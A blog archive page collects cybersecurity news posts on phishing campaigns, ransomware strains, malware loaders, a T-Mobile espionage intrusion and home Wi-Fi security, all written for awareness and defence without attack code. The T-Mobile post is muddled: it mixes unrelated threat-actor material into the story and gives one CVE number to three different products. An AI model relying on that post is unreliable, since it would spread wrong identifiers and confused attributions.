Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Cyber Threats. Show all posts
SharePoint
Credential Theft Cyber Fraud Cyber Threats Microsoft 365 login Microsoft visio Phishing Attack Phishing Campaigns SharePoint

New Two-Step Phishing Attack Exploits Microsoft Visio and SharePoint

 

A novel two-step phishing strategy is targeting Microsoft Visio files (.vsdx) and SharePoint, signaling a new trend in cyber deception, according to experts. Researchers at Perception Point have noted a significant rise in attacks leveraging these previously uncommon .vsdx files.

These files act as delivery tools, directing victims to phishing pages that replicate Microsoft 365 login portals, aiming to steal user credentials.

The two-step phishing attacks employ layered techniques to evade detection. Rather than delivering harmful content directly, these campaigns use trusted platforms like Microsoft SharePoint to host files that appear legitimate. Attackers embed URLs within Visio files, which redirect victims to malicious websites when clicked, bypassing traditional email security systems.

Microsoft Visio, a popular tool for professional diagram creation, has now become a phishing vector. Cybercriminals send emails with Visio files from compromised accounts, often mimicking urgent business communications such as proposals or purchase orders. This tactic encourages recipients to act quickly, increasing the likelihood of success.

Since the emails come from stolen accounts, they often pass authentication checks and evade recipient security filters. In some cases, attackers include .eml files within the emails, embedding additional malicious URLs linked to SharePoint-hosted files.

The Visio files typically contain a clickable button labeled "View Document." Victims are instructed to press the Ctrl key while clicking the button to access the malicious URL. This step, requiring manual interaction, bypasses automated security systems that cannot simulate such behaviors.

Perception Point advises organizations to strengthen their defenses against sophisticated phishing campaigns by adopting advanced threat detection solutions. Suggested measures include:

  • Dynamic URL analysis to identify harmful links.
  • Object detection models to flag suspicious files.
  • Enhanced authentication mechanisms to reduce the impact of compromised accounts.
Read more »
ransomware prevention
Cyber Security Cyber Threats Cybersecurity cybersecurity tips extortion scams fake hacking Phishing Scams ransomware prevention

Understanding the Threat of Fake Hacking: How to Stay Protected

  •  

In the dynamic and high-stakes field of cybersecurity, the word “hacking” often evokes thoughts of complex cyberattacks and data breaches. However, a lesser-known but equally concerning issue is the emergence of “fake hacking,” where individuals or groups falsely claim to have infiltrated computer systems.

Fake hacking occurs when attackers pretend to breach a network or device without actually doing so. While these actions may not always cause long-term technical damage, they can lead to serious consequences such as extortion and reputational harm. “Fake hacking is particularly insidious because it leverages people’s fear and uncertainty about cybersecurity,” explains William Petherbridge, Manager of Systems Engineering at the cybersecurity firm Fortinet. “Attackers are essentially tricking victims into believing their systems have been compromised in order to extract money or other concessions.”

A common tool used in fake hacking is the “hacker typer,” a website that mimics the look of a system being hacked, displaying lines of code scrolling rapidly across the screen. Other deceptive tactics include emails falsely claiming ransomware infections or pop-ups warning of non-existent malware.

“The goal of the fake hacker is to create a sense of panic and urgency in order to pressure the victim into paying a ‘ransom’ or purchasing some kind of ‘protection’ service,” says Petherbridge. “And unfortunately, if the target isn’t vigilant, they can fall for these tricks quite easily.”

To differentiate between legitimate and fake hacking threats, Petherbridge highlights key warning signs:
  • Money Demands: Requests for relatively small amounts of money, often in cryptocurrency, are a strong indication of fake hacking.
  • Unchanged Systems: Genuine breaches usually involve noticeable changes, such as altered files, new accounts, or unusual network activity. If everything appears normal, the hack is likely fabricated.
  • Disorganized Communication: Fake hackers often lack the sophistication of genuine attackers, with poorly structured emails, inconsistent demands, and an absence of technical details.
To combat fake hacking, Petherbridge advises verifying any claims before taking action and consulting cybersecurity professionals, including former hackers, who can identify fabricated threats. Employee training to recognize these red flags is also crucial.

“The most important step is to never panic or rush into a decision when faced with a purported hacking incident,” Petherbridge emphasizes. “Take the time to carefully assess the situation, double-check the facts, and respond accordingly. Falling for a fake hack can be just as damaging as a real one.”

The rise of fake hacking highlights the complexity and evolving nature of cybersecurity. While these attacks lack the technical sophistication of genuine breaches, they can cause significant harm through financial loss, reputational damage, and eroded trust.

By recognizing the signs of fake hacking and implementing strong security protocols, individuals and organizations can safeguard themselves from these deceptive threats. Vigilance, education, and a calm, calculated response remain the best defenses.
Read more »
secure email gateways
Credential Theft Cyber Security Cyber Threats cybersecurity breaches Group-IB report Phishing Campaign phishing techniques secure email gateways

Group-IB Unveils Sophisticated Phishing Campaign Targeting Global Organizations

 


A recent report by Group-IB has exposed a highly advanced phishing campaign targeting employees from 30 companies across 15 jurisdictions. Using trusted domains and cutting-edge personalization techniques, attackers have bypassed Secure Email Gateways (SEGs) and exploited victims in critical sectors such as finance, government, aerospace, and energy.

Advanced Obfuscation and Multi-Layered Deception

The investigation, initiated in July 2024, uncovered the attackers' use of:

  • Over 200 phishing links hosted on legitimate platforms like Adobe’s InDesign cloud service and Google AMP.
  • Techniques to bypass detection systems that typically block suspicious or unknown domains.

“Nine out of ten cyberattacks start with a phishing email, making it the most common entry point for threat actors,” the report emphasized.

Phishing Emails That Mimic Trusted Brands

The attackers used professionally designed phishing emails that impersonated well-known brands, including:

  • DocuSign, prompting victims to sign fake contracts.
  • Adobe-hosted links, disguising fraudulent login pages as critical documents.

These emails featured professional formatting, familiar logos, and dynamically personalized elements. For example, by extracting a victim’s email domain, the attackers matched logos and page titles to the targeted organization, enhancing credibility.

“Scammers use a technique that dynamically pulls company logos from the official website to make the phishing links look legitimate,” the report noted.

Exploitation of APIs for Realistic Branding

The attackers leveraged APIs like https://logo.clearbit.com/[company domain] to integrate authentic logos into phishing sites. This seamless branding approach increased user trust and made phishing attempts harder to detect.

Concealing Operations with URL Redirection and Encoding

To evade detection, attackers used:

  • URL redirections via Google AMP to create complex trails.
  • Encoded parameters to obscure the attack path.

Victims were redirected to phishing pages that appeared legitimate, with pre-filled email addresses further enhancing the illusion of authenticity. Once users entered their credentials, the stolen data was sent to Command-and-Control (C2) servers or Telegram bots via API endpoints.

Advanced Data Exfiltration Techniques

The phishing sites contained JavaScript snippets that transmitted stolen credentials using Base64 encoding, effectively hiding the data during analysis. Group-IB analysts observed: “The JSON response from Telegram’s API confirms that the stolen credentials were successfully sent to a private chat controlled by the attacker.”

Ongoing Evolution in Phishing Tactics

Group-IB warns that these techniques signify a continuous evolution in phishing methodologies: “Threat actors are quickly adapting, constantly refining and improving their techniques to bypass security measures and exploit vulnerabilities.”

Conclusion: A Growing Need for Vigilance

This campaign serves as a stark reminder of the ever-evolving nature of cyber threats. Organizations must strengthen their defenses and educate employees to identify and respond to increasingly sophisticated phishing attempts.

Read more »
United States
Cyber Security Cyber Threats NATO South Korea United States

South Korea’s Rising Influence in Global Cybersecurity

 


South Korea’s Expanding Role in Global Cybersecurity

South Korea is emerging as a pivotal player in the global cybersecurity landscape, particularly against the backdrop of escalating tensions between the United States and China in cyberspace. By participating in high-profile cybersecurity exercises and fostering international collaborations, the country is bolstering its reputation as a key ally in both regional and global cyber defense initiatives.

Recently, South Korea hosted the APEX cyberwarfare exercise, which gathered cybersecurity experts and defense personnel from over 20 nations. This exercise simulated cyberattacks on critical infrastructure, enabling participants to devise defensive strategies and exchange vital insights. South Korea has also actively participated in NATO-led events, such as the Locked Shields exercise, which focuses on testing and enhancing cyber resilience.

In addition, South Korea showcased its commitment to international cybersecurity efforts by attending the Cyber Champions Summit in Sydney. The country is set to host the next iteration of the summit, emphasizing its dedication to fostering global cooperation in addressing cyber threats.

Strategic Alliances and Emerging Trends

South Korea's advanced technological capabilities and strategic location have positioned it as a vital partner for the United States in addressing cyber threats, especially those originating from China. According to analysts, South Korea’s infrastructure serves as a communications hub for critical trans-Pacific submarine cables connecting major networks across Asia, including China. Experts have also suggested that the country may act as a base for US cyber operations, similar to its role in hosting the THAAD missile system in 2017.

China, meanwhile, has been enhancing its cyber capabilities in response to growing alliances among its rivals. In April 2024, China reorganized its People’s Liberation Army to include specialized units dedicated to cyber, information, and space operations. Despite these efforts, experts note that China’s cyber capabilities still lag behind those of the US and its allies.

South Korea’s increasing involvement in cybersecurity underscores its strategic importance in addressing modern cyber challenges. By collaborating with the US, NATO, and other allies, the nation is strengthening its cyber defenses while contributing to a broader security framework in the Indo-Pacific region. These initiatives are poised to shape the global cybersecurity landscape in the coming years.

Read more »
T-Mobile
Chinese Cyber Threat CISA Cyber Crime cyber espionage Cyber Hackers Cyber Threats CyberCrime Cybersecurity Seerver T-Mobile

T-Mobile System Intrusion Tied to Chinese Cyber Threat

 


T-Mobile Corporation has confirmed that it has been a victim of cyber-espionage campaigns launched against telecom companies for a long time. T-Mobile is the latest telecommunications company to report being affected by a large-scale cyber-espionage campaign waged by state-sponsored hackers in China. 

There has been some confusion as to whether the breach involves customer data or critical systems. However, T-Mobile has maintained that there has been no significant impact on its customers' data and critical systems. This breach is part of a larger attack on major telecom providers, raising questions regarding the security of critical communications infrastructure around the world. 

It has been reported that the FBI and CISA are pursuing investigations into a massive cyber-espionage campaign perpetrated by Chinese-linked threat actors that targeted U.S. telecommunications, stealing call records and accessing private communications of government officials and political figures by compromising networks. 

It was confirmed by the USA intelligence agencies that Chinese threats had penetrated the private communications of a "limited number" of government officials after several U.S. broadband providers had been compromised. 

A cyber spy stole personal information belonging to the targeted individuals, according to court orders, which were subject to a search warrant by the United States government to gather that information. This attack was conducted by an intrusion team targeting the World Expo scheduled to take place in Osaka, Japan in 2025, as a lure for the intrusion team, according to ESET's APT Activity Report for the period between April and September 2024.

MirrorFace continues to capture the attention of Japanese people and events, despite this new geographical target, proving their dedication to Japan and its related events. MirrorFace, as well as Earth Kasha, is one of the clusters categorized under an umbrella group called APT10, which includes other clusters classified under Earth Tengshe and Bronze Starlight, as well. 

At least since 2018, the company has been targeting Japanese organizations, although its operations have been further expanded to include Taiwan and India with a new campaign observed in early 2023, albeit it is still focused on the Japanese market. During the hacking crew's history, it has evolved from a few backdoor programs, namely ANEL (a.k.a. Uppercut), LODEINFO, and NOOPDOOR (also known as HiddenFace), to an arsenal of infections, which now consists of backdoors and credential thieves, such as MirrorStealer and ANEL. 

Having said that, it's important to note that T-Mobile's cybersecurity practice has recently been subjected to massive criticism since it's experienced a lot of data breaches in recent years. It was part of the company's settlement with the FCC of $31.5 million for previous breaches, of which half was for an improvement of the security infrastructure. The data breaches that have repeatedly targeted T-Mobile, which is owned by Deutsche Telekom Corporation, have been one of the most challenging aspects of the company's recent history. 

According to the company, back in August 2021, 49 million T-Mobile account holders were affected by the data breach, but the hackers claimed that they had stolen data from 100 million users on the network. According to T-Mobile, it is actively monitoring the situation and is working closely with government officials to investigate the breach to prevent any further issues from occurring. Currently, there is no evidence that the company's systems have hurt the privacy, security, or functionality of its customers, but the firm maintains that no harm has been caused. 

The company is paying close attention to this industry-wide attack that is affecting the entire industry. Quite to the contrary, due to the security controls in our network structure, and the diligent monitoring and response of our systems, T-Mobile has not witnessed any significant impact on its data or systems. As far as we are aware, no evidence has been found that the company's customer or other sensitive information has been accessed or exfiltrated as other companies may have done. 

The situation will be closely monitored by industry peers as well as the relevant authorities, and we will work with them to resolve it.” A recent incident at T-Mobile has come at a time when the company is expanding its cyber-security practices to combat these threats. In February of this year, the company settled a $31.5 million lawsuit with the Federal Communications Commission, more than half of which was devoted to improving security infrastructure as a result of its prior breaches. 

The T-Mobile Security breach is a prime example of the unique challenges that face the telecommunications sector, which is classified as critical infrastructure under federal law because of its importance to the nation. As an upstream provider of information and communications, telecommunications companies play a vital role in healthcare, government, and the private sector, allowing everything from emergency services to business transactions to personal connectivity to take place. 

Therefore, these networks are prime targets for state-sponsored cyber campaigns that seek to exploit their role in facilitating sensitive communications by exploiting their vulnerability to state-sponsored cyber campaigns. There has been a shift in how cyber-espionage tactics have been used over the past few years twhichis disturbing. Attackers like Salt Typhoon take advantage of wiretap systems and sensitive communication channels to steal data and compromise the integrity of systems and networks vital to national security efforts. 

As part of a new analysis published on November 19, 2024, Trend Micro discovered that the MirrorFace actor was using the vulnerability of Array AG (CVE-2023-45727), Proself (CVE-2023-45727) and FortiOS/FortiProxy (CVE-2023-45727) for the initial access of its public-facing enterprise products, which enabled the MirrorFace attacker to access the products. It has been reported that they had installed several backdoors within the victim's network after gaining access to achieve persistence on the network," said security researcher Hara Hiroaki. Among these are the 'Cobalt Strike' and 'LODEINFO' programs, as well as the 'NOOPDOOR' program that was discovered last year. 

A sophisticated and complex implant like NOOPDOOR can be decrypted and launched using a shellcode loader named NOOPLDR to install it on the system. It includes built-in functions, in addition to modules that enable the uploading and downloading of files, the running of additional programs, and the communication with a server controlled by an attacker either actively or passively. As a result, Hiroaki noted, both active and passive modes, for the most part, use different encryption algorithms, as well as backdoor commands, respectively, which means that the channels can't be accessed by one another and are completely independent of one another.
Read more »
TLS inspection
Cato Networks CVE exploits Cyber Security Cyber Threats Cybersecurity Data Privacy Penetration Testing Ransomware ransomware-as-a-service Shadow AI TLS inspection

Ransomware Gangs Actively Recruiting Pen Testers: Insights from Cato Networks' Q3 2024 Report

 

Cybercriminals are increasingly targeting penetration testers to join ransomware affiliate programs such as Apos, Lynx, and Rabbit Hole, according to Cato Network's Q3 2024 SASE Threat Report, published by its Cyber Threats Research Lab (CTRL).

The report highlights numerous Russian-language job advertisements uncovered through surveillance of discussions on the Russian Anonymous Marketplace (RAMP). Speaking at an event in Stuttgart, Germany, on November 12, Etay Maor, Chief Security Strategist at Cato Networks, explained:"Penetration testing is a term from the security side of things when we try to reach our own systems to see if there are any holes. Now, ransomware gangs are hiring people with the same level of expertise - not to secure systems, but to target systems."

He further noted, "There's a whole economy in the criminal underground just behind this area of ransomware."

The report details how ransomware operators aim to ensure the effectiveness of their attacks by recruiting skilled developers and testers. Maor emphasized the evolution of ransomware-as-a-service (RaaS), stating, "[Ransomware-as-a-service] is constantly evolving. I think they're going into much more details than before, especially in some of their recruitment."

Cato Networks' team discovered instances of ransomware tools being sold, such as locker source code priced at $45,000. Maor remarked:"The bar keeps going down in terms of how much it takes to be a criminal. In the past, cybercriminals may have needed to know how to program. Then in the early 2000s, you could buy viruses. Now you don't need to even buy them because [other cybercriminals] will do this for you."

AI's role in facilitating cybercrime was also noted as a factor lowering barriers to entry. The report flagged examples like a user under the name ‘eloncrypto’ offering a MAKOP ransomware builder, an offshoot of PHOBOS ransomware.

The report warns of the growing threat posed by Shadow AI—where organizations or employees use AI tools without proper governance. Of the AI applications monitored, Bodygram, Craiyon, Otter.ai, Writesonic, and Character.AI were among those flagged for security risks, primarily data privacy concerns.

Cato CTRL also identified critical gaps in Transport Layer Security (TLS) inspection. Only 45% of surveyed organizations utilized TLS inspection, and just 3% inspected all relevant sessions. This lapse allows attackers to leverage encrypted TLS traffic to evade detection.

In Q3 2024, Cato CTRL noted that 60% of CVE exploit attempts were blocked within TLS traffic. Prominent vulnerabilities targeted included Log4j, SolarWinds, and ConnectWise.

The report is based on the analysis of 1.46 trillion network flows across over 2,500 global customers between July and September 2024. It underscores the evolving tactics of ransomware gangs and the growing challenges organizations face in safeguarding their systems.
Read more »
SMTP servers
Authentication Cyber Security Cyber Threats Cybersecurity Dark Web Data Privacy email encryption email security Malware Distribution Phishing Attacks SMTP servers

New SMTP Cracking Tool for 2024 Sold on Dark Web Sparks Email Security Alarm

 

A new method targeting SMTP (Simple Mail Transfer Protocol) servers, specifically updated for 2024, has surfaced for sale on the dark web, sparking significant concerns about email security and data privacy.

This cracking technique is engineered to bypass protective measures, enabling unauthorized access to email servers. Such breaches risk compromising personal, business, and government communications.

The availability of this tool showcases the growing sophistication of cybercriminals and their ability to exploit weaknesses in email defenses. Unauthorized access to SMTP servers not only exposes private correspondence but also facilitates phishing, spam campaigns, and cyber-espionage.

Experts caution that widespread use of this method could result in increased phishing attacks, credential theft, and malware distribution. "Organizations and individuals must prioritize strengthening email security protocols, implementing strong authentication, and closely monitoring for unusual server activity," they advise.

Mitigating these risks requires consistent updates to security patches, enforcing multi-factor authentication, and using email encryption. The emergence of this dark web listing highlights the ongoing threats cybercriminals pose to critical communication systems.

As attackers continue to innovate, the cybersecurity community emphasizes vigilance and proactive defense strategies to safeguard sensitive information. This development underscores the urgent need for robust email security measures in the face of evolving cyber threats.
Read more »
Ransomwares
Akira Ransomware Cyber Security Cyber Threats LockBit Malware Attack malware prevention Malwares RansomHub Ransomwares

2024’s Most Dangerous Malware: A Wake-Up Call for Cybersecurity

 

OpenText, a leader in cybersecurity insights, has released its eagerly awaited “Nastiest Malware of 2024” list, highlighting some of the most destructive and adaptive cyber threats of the year. The list illustrates how ransomware and other malicious software continue to evolve, particularly regarding their impact on critical infrastructure. As cybercriminals refine their tactics, the need to strengthen cybersecurity measures has become increasingly urgent. Organizations around the globe are projected to boost their cybersecurity spending by 14.3% in 2024, raising total investments to over $215 billion, which reflects the magnitude of the challenges posed by these threats. 

LockBit claimed the title of the most dangerous malware of the year. This ransomware-as-a-service (RaaS) entity has demonstrated its ability to evade law enforcement efforts, including those from the FBI. Its ongoing attacks on critical infrastructure showcase its resilience and technical prowess. According to the FBI, LockBit was responsible for 175 reported attacks on essential systems in 2023 alone. The group’s bold ambition to target one million businesses emphasizes its threat level and solidifies its position in the ransomware landscape. 

Akira, a relatively new player, has rapidly gained infamy for its aggressive tactics. This ransomware has been particularly active in industries such as healthcare, manufacturing, and finance, using advanced encryption methods to cause significant disruption. Its retro-inspired branding contrasts sharply with its destructive potential, making it a popular choice among cybercriminal affiliates. 

Meanwhile, RansomHub, which may have connections to the infamous Black Cat (ALPHV) group, has made headlines with its high-profile attacks, including a daring strike on Planned Parenthood that compromised sensitive patient data. 

Other significant threats include Dark Angels, recognized for its precision-targeted attacks on Fortune 50 companies, and Play Ransomware, which takes advantage of vulnerabilities in FortiOS systems and RDP servers. Redline Stealer, while not technically ransomware, this type of threat significantly endangers organizations by focusing on stealing credentials and sensitive information. Each of these threats illustrates how cybercriminals are continually pushing the limits, employing advanced tactics to stay ahead of defenses. 

Muhi Majzoub, OpenText’s EVP and Chief Product Officer, notes that the increase in ransomware targeting critical infrastructure highlights the growing risks to national security and public safety. At the same time, the heightened emphasis on cybersecurity investments is a positive indication that organizations are recognizing these threats. However, the ability of ransomware groups to adapt remains a significant worry, as these criminals continue to leverage new technologies, including artificial intelligence, to create more sophisticated attacks. 

The findings from this year reveal a harsh truth: while progress in cybersecurity is being made, the rapid pace of innovation in malware development poses an ongoing challenge. As companies enhance their vigilance and dedicate more resources to protect vital systems, the battle against cyber threats is far from finished. The changing nature of these attacks requires ongoing adaptation, collaboration, and investment to protect the essential services that support modern society.
Read more »
SafePay ransomware
advanced ransomware techniques Cyber Security Cyber Threats Data Encryption LockBit source code ransomware strain ransomware tactics SafePay ransomware

SafePay Ransomware: A New Threat with Advanced Techniques

 

In October 2024, cybersecurity experts at Huntress identified a previously undocumented ransomware strain named SafePay. This malware was deployed in two separate incidents and stands out for its distinctive features, including the use of .safepay as an encrypted file extension and a ransom note titled readme_safepay.txt. Despite its limited exposure, SafePay’s techniques signal a skilled operator leveraging advanced ransomware methods.

SafePay is linked to older ransomware families like LockBit, with Huntress analysts stating: “During our analysis of the ransomware binary, we began to notice a large number of similarities to the extensively analyzed LockBit samples from the end of 2022.” These parallels suggest that SafePay’s developers may have utilized leaked LockBit source code to create their malware, showcasing a blend of stealth and sophistication.

SafePay follows a systematic two-phase attack process:

  • Data Collection and Exfiltration: In one observed incident, attackers used WinRAR to archive data across multiple systems and exfiltrated it via FileZilla. Analysts remarked, “This activity looks like potential data exfiltration from the network—collected and archived with WinRAR and then possibly exfiltrated out using FTP.” Tools were uninstalled post-use to erase traces.
  • Encryption Deployment: Using Remote Desktop Protocol (RDP) access, attackers deployed ransomware scripts via PowerShell, targeting network shares. Commands such as disabling shadow copies and modifying boot configurations were executed to impede recovery. The ransom note ominously begins with: “Greetings! Your corporate network was attacked by SafePay team,” and outlines negotiation steps for data recovery.
The SafePay group operates on both the Tor network and the decentralized The Open Network (TON). Their leak site showcases victim organizations and stolen data directories. Huntress analysts discovered vulnerabilities in the site’s backend, exposing an Apache server status endpoint, offering insights into the group’s operations.

Although relatively new, SafePay’s connection to LockBit and its sophisticated techniques present significant risks across industries. As Huntress analysts concluded: “The threat actor was able to use valid credentials to access customer endpoints and was not observed enabling RDP, creating new user accounts, or establishing persistence.”

Read more »
Trustwave SpiderLabs
Cyber Threats Cybersecurity JPHP language malware Pronsis Loader Ransomware Spyware stealth malware Threat Intelligence Trustwave SpiderLabs

New Malware ‘Pronsis Loader’ Uses Rare JPHP Language to Evade Detection and Deliver High-Risk Payloads

 

Trustwave SpiderLabs recently announced the discovery of a new form of malware named Pronsis Loader. This malware has already started to pose significant challenges for cybersecurity experts due to its unique design and operation. Pronsis Loader leverages JPHP, a lesser-known programming language, and incorporates sophisticated installation tactics, which complicates detection and mitigation efforts by standard security tools.

JPHP, a variation of the popular PHP programming language, is rarely seen in the world of malware development, especially for desktop applications. While PHP is commonly used for web applications, its adaptation into desktop malware through Pronsis Loader offers cybercriminals an advantage by making it harder to detect.

Pronsis Loader’s use of JPHP helps it bypass conventional detection systems, which often rely on identifying common programming languages in malware. This less common language adds an extra layer of “stealth,” allowing the malware to slip past many security tools. In addition, Pronsis Loader uses advanced obfuscation and encryption to hide during initial infection, silently installing itself by imitating legitimate processes. This stealth tactic hinders both automated and manual detection efforts.

Once Pronsis Loader is installed, it can download and execute other types of malware, such as ransomware, spyware, and data-theft tools. This modular approach makes it highly adaptable, allowing cybercriminals to customize payloads based on their target’s specific system or environment. As part of a broader trend in cybercrime, loaders like Pronsis are used in multi-stage attacks to introduce further malicious programs, providing attackers with a flexible foundation for varied threats.

To counter this evolving threat, security teams should consider adopting advanced behavioral monitoring and analysis techniques that identify malware based on its behavior, rather than relying solely on signature detection. Additionally, staying updated on threat intelligence helps to recognize rare languages and methods, such as those employed by Pronsis Loader.

 Shawn Kanady, Global Director at Trustwave SpiderLabs, emphasized the significance of Pronsis Loader’s stealth and adaptability, noting its potential to deliver high-risk payloads like Lumma Stealer and Latrodectus. Kanady concluded that understanding Pronsis Loader’s unique design and infrastructure offers valuable insights for strengthening cybersecurity defenses against future campaigns.







Read more »
phishing
Botnet Cyber Attacks Cyber Threats DDoS phishing

Cybersecurity Beyond Phishing: Six Underrated Threats


Cybercriminals are continually developing new methods to exploit vulnerabilities, and even the most tech-savvy individuals and organizations can find themselves at risk. While some cyberattacks like phishing and malware are well-known, several lesser-known but equally dangerous threats require attention. This blog post explores six types of cyberattacks you might not have considered but should be on your radar.

1. Botnet Attacks

A botnet attack involves a network of compromised computers, or "bots," which are controlled by a single entity, often referred to as a "botmaster." These botnets can be used to launch large-scale cyberattacks such as Distributed Denial-of-Service (DDoS) attacks, which overwhelm a target’s resources, rendering it inaccessible. 

In 2016, hackers used the Mirai botnet to take control of millions of devices and launched a huge DDoS attack on Dyn, a major domain name server provider.

Some hackers also take over IoT devices to "brick" them, which means they damage the device’s firmware so it becomes useless. They do this for fun or to teach people about cybersecurity.

2. LLMjacking

As language models become integral in various applications, they present new cyberattack vectors. LLMjacking, or Large Language Model hijacking, involves manipulating language models to generate harmful or misleading information. 

Attackers can exploit vulnerabilities in these models to spread misinformation, influence public opinion, or even automate phishing attacks. The rise of AI-powered tools necessitates the implementation of stringent security measures to safeguard against such manipulations.

Companies that utilize cloud-hosted Large Language Models (LLMs) are at risk of LLM jacking because they possess the necessary server resources to operate generative AI programs. Hackers might exploit these resources for personal purposes, such as creating their own images, or for more malicious activities like generating harmful code, contaminating the models, or stealing sensitive information.

While an individual hijacking a cloud-based LLM for personal use might not cause significant damage, the costs associated with resource usage can be substantial. A severe attack could result in charges ranging from $50,000 to $100,000 per day for the owner.

3. Ransomware

Unlike traditional malware that aims to steal information, ransomware directly extorts victims. Attackers encrypt valuable data and demand payment, often in cryptocurrency, for the decryption key. Organizations of all sizes are potential targets, and the financial and reputational damage can be severe. Preventative measures, including regular data backups and cybersecurity training, are crucial in mitigating the risks of ransomware attacks.

4. Insider Threats

An insider threat comes from within the organization, typically from employees, contractors, or business partners who have inside information concerning the organization’s security practices. These threats can be malicious or unintentional but are dangerous due to the privileged access insiders have. 

They may misuse their access to steal sensitive information, disrupt operations, or introduce vulnerabilities. Organizations need to implement strict access controls, regular monitoring, and education to reduce the risk of insider threats.

5. Man-in-the-Middle (MitM) Attacks

Man-in-the-middle attacks occur when an attacker intercepts communication between two parties without their knowledge. The attacker can then eavesdrop, manipulate, or steal sensitive information being exchanged. 

MitM attacks are particularly concerning for financial transactions and other confidential communications. Encrypted communication channels, strong authentication methods, and educating users about potential risks are effective strategies to prevent such attacks.

6. Phishing Schemes

Phishing remains one of the most prevalent cyber threats, evolving in sophistication and technique. Attackers use deceptive emails, messages, or websites to trick individuals into divulging personal information such as usernames, passwords, and credit card details. 

Spear phishing, a targeted form of phishing, involves personalized attacks on specific individuals or organizations, making them harder to detect. Continuous cybersecurity awareness training and employing advanced email filtering solutions can help protect against phishing schemes.

Read more »
vigilance
Cyber Fraud Cyber Threats Cybersecurity Data Theft phishing Scams Sensitive Information Spear Phishing Spoofing vigilance

The Evolution of Phishing Emails: From Simple Scams to Sophisticated Cyber Threats

 

Phishing emails have undergone significant changes over the past few decades. Once simple and easy to detect, these scams have now evolved into a sophisticated cyber threat, targeting even the most tech-savvy individuals and organizations. Understanding the development of phishing attacks is key to protecting yourself from these ever-evolving cyber dangers.

In the late 1990s and early 2000s, phishing emails were quite basic and easily identifiable. One of the most well-known scams was the "Nigerian Prince" email. These messages claimed to be from foreign royalty or officials, offering large sums of money in return for a small processing fee. The common signs included poor language, unrealistic promises, and large financial rewards—elements that eventually made these scams easy for users to recognize and dismiss.

As people became aware of these early scams, phishing attacks shifted focus, aiming to steal sensitive financial information. By the mid-2000s, attackers began impersonating banks and financial institutions in their emails. These messages often used fear-inducing language, such as warnings of account breaches, to pressure recipients into handing over personal details like login credentials and credit card information. During this time, phishing attempts were still marked by clear warning signs: poorly written emails, generic greetings, and inaccurate logos. However, as technology advanced, so did the attackers' ability to produce more convincing content.

The evolution of phishing took a major step forward with the introduction of spear phishing. Unlike traditional phishing, which targets a broad audience, spear phishing focuses on specific individuals or companies. Attackers gather personal information through social media and public records to craft emails that appear highly legitimate, often addressing the victim by name and referencing workplace details. This tailored approach makes the scam more believable and increases the chances of success.

Phishing emails today have become highly sophisticated, utilizing advanced techniques such as email spoofing to mimic trusted sources. Attackers frequently impersonate colleagues, supervisors, or official entities, making it difficult for users to tell the difference between genuine and malicious messages. Modern phishing schemes often rely on psychological tactics, using fear or urgency to pressure recipients into clicking harmful links or downloading malware. This evolution reflects the growing complexity of cybercriminal activities, demanding greater awareness and stronger cybersecurity defenses.

In summary, phishing emails have evolved from basic scams to intricate, personalized attacks that are harder to detect. Being informed about these tactics and staying vigilant is critical in the digital age. If you're ever in doubt about an email’s legitimacy, contact your Information Security Team for verification.
Read more »
WiFi
Cyber Threats Encryption Online Security Privacy WiFi

How Ignoring These Wi-Fi Settings Can Leave You Vulnerable to Hackers

 

In today's plugged-in world, most of us rely on the Internet for nearly everything from shopping and banking to communicating with family members. Whereas increasing reliance on the internet has exposed opportunities for doing just about anything remotely, it also increases the chances that cyber thieves will target your home Wi-Fi network looking for a weak point to pry into. Thus, securing your home network is critical to your own privacy.

The Importance of Router Settings

But for privacy lawyer Alysa Hutnik, the most common mistake isn't what people do but rather what they don't: namely, change the default settings on their Wi-Fi routers. The default settings on every router are public knowledge, and that's how hackers get in. "You wouldn't leave your front door open," she points out-a failure to alter these default settings is a little different from that.

The very first thing in securing your Wi-Fi network is changing the default password to something strong and unique. This would reduce the chances of unauthorised access significantly. You may also want to take a look at all the other configurations you can make on your router to optimise security features.

Encryption: Protecting Your Data

Another thing you should do to secure your home network is to enable encryption. Most of the current routers do offer some form of encryption options, like WPA (Wi-Fi Protected Access). This encrypts information in such a way that while travelling over your network, it makes hacking even more inconvenient to intercept. If you have not enabled the encryption on your router then it's pretty much the same as leaving personal information lying around open for everyone to grab. A check on your settings and enabling the WPA encryption adds the much-needed layer of defence.

Check Security Settings on All Devices

Securing your home network doesn't stop at the router. Any device that connects to your Wi-Fi should have its privacy and security settings properly enabled as well. Hutnik says that whenever you bring home a new device, a new phone, smart speaker, or laptop, it takes a few minutes to read through the options for privacy and security settings. Many devices have configurations not optimised for security by default. Usually, those configurations can be customised in a minute or two.

Quick Easy-to-Follow Steps to Mitigate Risk

Beyond the configuration of your network and devices, Hutnik calls you to take a few extra precautionary actions regarding your privacy. One such action is sticking tape on your webcam when you are not using it. There is always the prospect of hackers taking control of your camera through malware, so spying on you. As simple as placing a sticker or a Post-it note on your webcam might give you relief over it.

Sure enough, these measures won't protect you from cyber-attacks right and left, but they certainly reduce the risk. The more of our lives we put online, the more important it becomes that we take time to harden our home networks and equipment.

Stay Vigilant and Stay Protected

This will help protect you more from hackers and other online threats: understanding home network vulnerabilities and taking preventive actions about routers, using encryption, and checking your devices' settings. It involves the little things like covering your webcam and thereby trying to ensure that these little habits make you a safer human being on the internet.


Take small steps in securing your home network to avoid many future headaches and ensure that your personal info does not end up in cyber-criminals' pockets.


Read more »
Technology Breach
ATM ATM Bitcoin ATMs Bitcoins Cryptocurrency Threats Cryptocurrencies cryptocurrency Cyber Security Cyber Threats CyberCrime Technology Breach

Bitcoin ATM Emerges as Major Threat to Cryptocurrency

 


There is an ominous growth in Bitcoin ATMs across the United States, and some experts have claimed they are also one of the biggest cybercrime threats to the country. As with other ATMs, Bitcoin ATMs share a few characteristics with their cash counterparts: there are PINs to punch, and there are withdrawal fees as well. 

However, unlike cash ATMs, crypto ATMs have a high value, making them prime targets for hackers who are looking for ways to steal data. The problem is that whereas the location of a cash ATM at a gas station may not draw much attention, the location of a Bitcoin ATM gets more scrutiny from fraudulent individuals. The UK's National Crime Agency has reported in an article published by CNBC on September 8 that Bitcoin ATMs have proven to be one of the most popular ways for individuals to buy and sell cryptocurrencies, although they have additionally evolved into a prime target for hackers and scammers. 

